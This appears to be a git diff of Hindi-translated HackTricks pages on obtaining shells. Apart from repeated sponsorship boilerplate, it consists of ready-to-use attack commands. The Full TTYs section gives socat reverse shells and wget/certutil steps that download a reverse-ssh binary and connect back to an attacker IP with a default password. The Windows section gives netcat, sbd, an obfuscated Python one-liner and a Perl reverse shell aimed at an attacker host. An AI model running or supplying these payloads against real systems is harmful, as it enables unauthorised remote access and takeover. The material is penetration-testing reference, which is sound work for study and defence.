यदि कमजोरी एक विभिन्न पायथन फ़ाइल में है, तो मुख्य पायथन फ़ाइल से ऑब्जेक्ट तक पहुंचने के लिए पिछले फ्लास्क ट्रिक की जाँच करें। यदि कमजोरी एक विभिन्न पायथन फ़ाइल में है, तो मुख्य पायथन फ़ाइल से ऑब्जेक्ट तक पहुंचने के लिए पिछले फ्लास्क ट्रिक की जाँच करें।
{% hint style="success" %}
एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
जीसीपी हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **PDF में HackTricks डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फ़ॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
# [**शैल्स - लिनक्स**](linux.md) # [**शैल्स - लिनक्स**](linux.md)
@ -21,7 +22,7 @@ HackTricks का समर्थन करने के अन्य तरी
# [**पूर्ण TTYs**](full-ttys.md) # [**पूर्ण TTYs**](full-ttys.md)
# **स्वचालित जनरेटेड शैल्स** # **स्वचालित जनरेटेड शैल्स**
* [**https://reverse-shell.sh/**](https://reverse-shell.sh/) * [**https://reverse-shell.sh/**](https://reverse-shell.sh/)
* [**https://www.revshells.com/**](https://www.revshells.com/) * [**https://www.revshells.com/**](https://www.revshells.com/)
@ -36,16 +37,17 @@ HackTricks का समर्थन करने के अन्य तरी
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,22 +1,23 @@
# पूर्ण TTYs # पूर्ण TTYs
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
## पूर्ण TTY ## पूर्ण TTY
ध्यान दें कि जिस शैल आप `SHELL` चर में सेट करते हैं, वह **अवश्य** _**/etc/shells**_ के अंदर **सूचीबद्ध होनी चाहिए** या `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`। इसके अलावा, ध्यान दें कि अगले स्निपेट्स केवल बैश में काम करेंगे। यदि आप zsh में हैं, तो `bash` चलाकर शैल अर्जित करने से पहले बैश में बदलें। ध्यान दें कि जिस शैल आप `SHELL` चर में सेट करते हैं, **उसे** _**/etc/shells**_ **में सूचीबद्ध होना चाहिए** या `SHELL` चर के लिए मान _**/etc/shells**_ फ़ाइल में नहीं मिला गया था इस घटना की सूचना दी गई है। इसके अलावा, ध्यान दें कि अगले स्निपेट्स केवल बैश में काम कर हैं। यदि आप zsh में हैं, तो शेल को प्राप्त करने से पहले `bash` चलाने के लिए बैश में बदलें।
#### Python #### Python
@ -49,7 +50,7 @@ socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim: #Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
``` ```
### **शैल्स उत्पन्न करें** ### **शैल उत्पन्न करें**
* `python -c 'import pty; pty.spawn("/bin/sh")'` * `python -c 'import pty; pty.spawn("/bin/sh")'`
* `echo os.system('/bin/bash')` * `echo os.system('/bin/bash')`
@ -64,15 +65,13 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
* vi: `:set shell=/bin/bash:shell` * vi: `:set shell=/bin/bash:shell`
* nmap: `!sh` * nmap: `!sh`
## **रिवर्स एसएसएच** ## **रिवर्सएसएसएच**
**इंटरैक्टिव शैल एक्सेस**, साथ ही **फ़ाइल ट्रांसफ़र** और **पोर्ट फ़ॉरवर्डिंग** के लिए एक सुविधाजनक तरीका है, लक्षित को ड्रॉप करना स्थिर लिंक्ड एसएसएच सर्वर [रिवर्स एसएसएच](https://github.com/Fahrj/reverse-ssh) टारगेट पर **इंटरैक्टिव शैल एक्सेस**, साथ ही **फ़ाइल ट्रांसफ़र** और **पोर्ट फ़ॉरवर्डिंग** के लिए एक सुविधाजनक तरीका है, लक्षित पर एक स्थिर-लिंक्ड एसएसएच सर्वर [रिवर्सएसएसएच](https://github.com/Fahrj/reverse-ssh) को लक्षित पर छोड़ना
नीचे एक उदाहरण है `x86` के लिए उपक्षिप्त बाइनरी के साथ। अन्य बाइनरी के लिए, देखें [रिलीज पेज](https://github.com/Fahrj/reverse-ssh/releases/latest/)। नीचे एक उदाहरण है `x86` के लिए उपक्षिप्त बाइनरी के साथ। अन्य बाइनरी के लिए, [रिलीज पेज](https://github.com/Fahrj/reverse-ssh/releases/latest/) की जांच करें
1. एसएसएच पोर्ट फॉरवर्डिंग अनुरोध पकड़ने के लिए स्थानीय रूप से तैयारी करें: 1. लोकली तैयारी करें ताकि एसएसएच पोर्ट फ़ॉरवर्डिंग अनुरोध को पकड़ सकें:
{% code overflow="wrap" %}
```bash ```bash
# Drop it via your preferred way, e.g. # Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
@ -99,9 +98,7 @@ certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/d
reverse-ssh.exe -p 4444 kali@10.0.0.2 reverse-ssh.exe -p 4444 kali@10.0.0.2
``` ```
{% endcode %} * यदि रिवर्स SSH पोर्ट फॉरवर्डिंग अनुरोध सफल रहा है, तो अब आपको `reverse-ssh(.exe)` चलाने वाले उपयोगकर्ता के संदर्भ में डिफ़ॉल्ट पासवर्ड `letmeinbrudipls` के साथ लॉग इन करने में सक्षम होना चाहिए:
* यदि ReverseSSH पोर्ट फॉरवर्डिंग अनुरोध सफल रहा है, तो अब आपको `reverse-ssh(.exe)` चलाने वाले उपयोगकर्ता के संदर्भ में डिफ़ॉल्ट पासवर्ड `letmeinbrudipls` के साथ लॉग इन करने में सक्षम होना चाहिए:
```bash ```bash
# Interactive shell access # Interactive shell access
ssh -p 8888 127.0.0.1 ssh -p 8888 127.0.0.1
@ -111,20 +108,21 @@ sftp -P 8888 127.0.0.1
``` ```
## कोई TTY नहीं ## कोई TTY नहीं
यदि किसी कारणवश आपको एक पूर्ण TTY प्राप्त नहीं हो सकता है, तो भी आप **प्रोग्रामों के साथ बातचीत कर सकते हैं** जो उपयोगकर्ता इनपुट की अपेक्षा करते हैं। निम्नलिखित उदाहरण में, पासवर्ड `sudo` को पास किया जाता है ताकि एक फ़ाइल पढ़ सके: यदि किसी कारणवश आपको एक पूर्ण TTY प्राप्त नहीं हो सकता है, तो फिर भी आप **प्रोग्रामों के साथ बातचीत कर सकते हैं** जो उपयोगकर्ता इनपुट की अपेक्षा करते हैं। निम्नलिखित उदाहरण में, पासवर्ड `sudo` को फ़ाइल पढ़ने के लिए पारित किया जाता है:
```bash ```bash
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact' expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
``` ```
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की हमारी विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह की खोज करें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** के लिए PRs सबमिट करके और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,22 +1,23 @@
# Shells - Windows # शैल्स - विंडोज
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a> <strong>के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें।
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
**Try Hard Security Group** **ट्राई हार्ड सिक्योरिटी ग्रुप**
<figure><img src="https://github.com/carlospolop/hacktricks/blob/in/generic-methodologies-and-resources/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %} {% embed url="https://discord.gg/tryhardsecurity" %}
@ -25,18 +26,15 @@ HackTricks का समर्थन करने के अन्य तरी
## Lolbas ## Lolbas
पृष्ठ [lolbas-project.github.io](https://lolbas-project.github.io/) विंडोज के लिए है जैसे [https://gtfobins.github.io/](https://gtfobins.github.io/) लिनक्स के लिए है।\ पृष्ठ [lolbas-project.github.io](https://lolbas-project.github.io/) विंडोज के लिए है जैसे [https://gtfobins.github.io/](https://gtfobins.github.io/) लिनक्स के लिए है।\
स्वाभाविक रूप से, **विंडोज में SUID फ़ाइलें या सुडो विशेषाधिकार नहीं हैं**, लेकिन यह उपयोगी है जानने के लिए **कैसे** कुछ **बाइनरी** (अ)दुरुपयोग किया जा सकता है कुछ अप्रत्याशित क्रियाएँ करने के लिए जैसे **कोड का अभि्यक्ति करें।** स्वाभाविक रूप से, **विंडोज में SUID फ़ाइलें या सुडो विशेषाधिकार नहीं हैं**, लेकिन यह उपयोगी है जानने के लिए **कैसे** कुछ **बाइनरी** (अब)युक्त किए जा सकते हैं कुछ प्रकार की अप्रत्याशित क्रियाएँ करने के लिए जैसे **कोड का विचार करें।**
## NC ## NC
```bash ```bash
nc.exe -e cmd.exe <Attacker_IP> <PORT> nc.exe -e cmd.exe <Attacker_IP> <PORT>
``` ```
## SBD ## SBD
[**sbd**](https://www.kali.org/tools/sbd/) **एक पोर्टेबल और सुरक्षित Netcat विकल्प है**। यह Unix जैसे सिस्टम और Win32 पर काम करता है। मजबूत एन्क्रिप्शन, प्रोग्राम निष्पादन, अनुकूलनीय स्रोत पोर्ट, और निरंतर पुनर्संबंधन जैसी विशेषताओं के साथ, sbd TCP/IP संचार के लिए एक बहुमुखी समाधान प्रदान करता है। Windows उपयोगकर्ताओं के लिए, Kali Linux वितरण से sbd.exe संस्करण को Netcat के लिए एक विश्वसनीय प्रतिस्थापन के रूप में उपयोग किया जा सकता है। **[sbd](https://www.kali.org/tools/sbd/) एक पोर्टेबल और सुरक्षित Netcat विकल्प है**। यह Unix जैसे सिस्टम और Win32 पर काम करता है। मजबूत एन्क्रिप्शन, प्रोग्राम निष्पादन, अनुकूलनीय स्रोत पोर्ट, और निरंतर पुनर्संधि जैसी विशेषताओं के साथ, sbd TCP/IP संचार के लिए एक बहुमुखी समाधान प्रदान करता है। Windows उपयोगकर्ताओं के लिए, Kali Linux वितरण से sbd.exe संस्करण को Netcat के लिए एक विश्वसनीय प्रतिस्थापन के रूप में उपयोग किया जा सकता है।
```bash ```bash
# Victims machine # Victims machine
sbd -l -p 4444 -e bash -v -n sbd -l -p 4444 -e bash -v -n
@ -48,48 +46,48 @@ sbd 10.10.10.10 4444
id id
uid=0(root) gid=0(root) groups=0(root) uid=0(root) gid=0(root) groups=0(root)
``` ```
## पायथन ## पायथन
```bash ```bash
#Windows #Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
``` ```
## पर्ल ## पर्ल
```bash ```bash
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
